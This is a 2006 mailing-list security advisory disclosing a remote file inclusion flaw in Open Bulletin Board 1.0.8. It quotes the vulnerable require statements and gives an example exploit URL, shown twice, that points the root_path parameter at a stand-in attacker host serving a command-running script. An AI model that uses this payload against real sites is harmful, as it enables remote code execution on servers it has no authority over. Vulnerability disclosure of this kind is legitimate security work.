Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability

l0x3 Mon, 11 Sep 2006 12:55:27 -0700

+--------------------------------------------------------------------

+


+  Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............:  Open Bulletin Board 1.0.8

+ Venedor ...........:   http://www.openbb.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Discovered by ..........: Eddy_BAck0o

+ Contact ...........: l0x3[at]hotmail.com

+

+--------------------------------------------------------------------

+--------------------------------------------------------------------

+ ./index Directory ...

~ [index.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ require $root_path . "base.php"; <--- 30 - 380

+ require $root_path . "base.php"; <--- 46 - 380

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd

+

+-------------------------------------------------------------------

+

~ [collector.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ root_path = "./"; <--- 24 - 194

+ require $root_path . "base.php"; <--- 159 - 194

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd

+

+-------------------------------------------------------------------

+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ; Qptan ] ;....

+--------------------------------------------------------------------

+--------------------------------------------------------------------

Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability

Reply via email to